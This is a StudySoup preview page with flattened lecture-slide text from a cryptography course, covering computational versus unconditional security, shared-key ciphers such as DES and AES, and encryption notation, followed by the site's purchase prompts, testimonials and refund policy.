unconditionally secure No amount of computation will help crack the cipher ie the only strategy is brute force In practice strive for computationally security Given enough power the attacker could crack the cipher example brute force attack But an attacker with only bounded resources is extremely unlikely to crack it Example Assume attacker has only polynomial time then encryption algorithm that can t be inverted in less than exponential time is secure Results are usually stated probabilistically 3909 CISTCOM 551 29 Kinds of Industrial Strength Crypto Shared Key Cryptography Public Key Cryptography Cryptographic Hashes All of these aim for computational security Not all methods have been proved to be intractable to crack 3909 CISTCOM 551 30 Shared Key Cryptography Sender amp receiver use the same key Key must remain private Also called symmetric or secret key cryptography Often are blockciphers Process plaintext data in blocks Examples DES TripleDES Blowfish Twofish AES Rijndael 3909 CISTCOM 551 31 Shared Key Notation Encryption algorithm E key x plain a cipher Notation Kmsg EK msg Decryption algorithm D key x cipher a plain D inverts E DK EK msg msg Use capital K for shared secret keys Sometimes E is the same algorithm as D 3909 CISTCOM 551 32


Buy Material

Are you sure you want to buy this material for

25 Karma

Buy Material

BOOM! Enjoy Your Free Notes!

We've added these Notes to your profile, click here to view them now.


You're already Subscribed!

Looks like you've already subscribed to StudySoup, you won't need to purchase another subscription to get this material. To access this material simply click 'View Full Document'

Why people love StudySoup

Jim McGreen Ohio University

"Knowing I can count on the Elite Notetaker in my class allows me to focus on what the professor is saying instead of just scribbling notes the whole time and falling behind."

Jennifer McGill UCSF Med School

"Selling my MCAT study guides and notes has been a great source of side revenue while I'm in school. Some months I'm making over $500! Plus, it makes me happy knowing that I'm helping future med students with their MCAT."

Bentley McCaw University of Florida

"I was shooting for a perfect 4.0 GPA this semester. Having StudySoup as a study aid was critical to helping me achieve my goal...and I nailed it!"


"Their 'Elite Notetakers' are making over $1,200/month in sales by creating high quality content that helps their classmates in a time of need."

Become an Elite Notetaker and start selling your notes online!

Refund Policy


All subscriptions to StudySoup are paid in full at the time of subscribing. To change your credit card information or to cancel your subscription, go to "Edit Settings". All credit card information will be available there. If you should decide to cancel your subscription, it will continue to be valid until the next payment period, as all payments for the current period were made in advance. For special circumstances, please email


StudySoup has more than 1 million course-specific study resources to help students study smarter. If you’re having trouble finding what you’re looking for, our customer support team can help you find what you need! Feel free to contact them here:

Recurring Subscriptions: If you have canceled your recurring subscription on the day of renewal and have not downloaded any documents, you may request a refund by submitting an email to

Satisfaction Guarantee: If you’re not satisfied with your subscription, you can contact us for further help. Contact must be made within 3 business days of your subscription purchase and your refund request will be subject for review.

Please Note: Refunds can never be provided more than 30 days after the initial purchase date regardless of your activity on the site.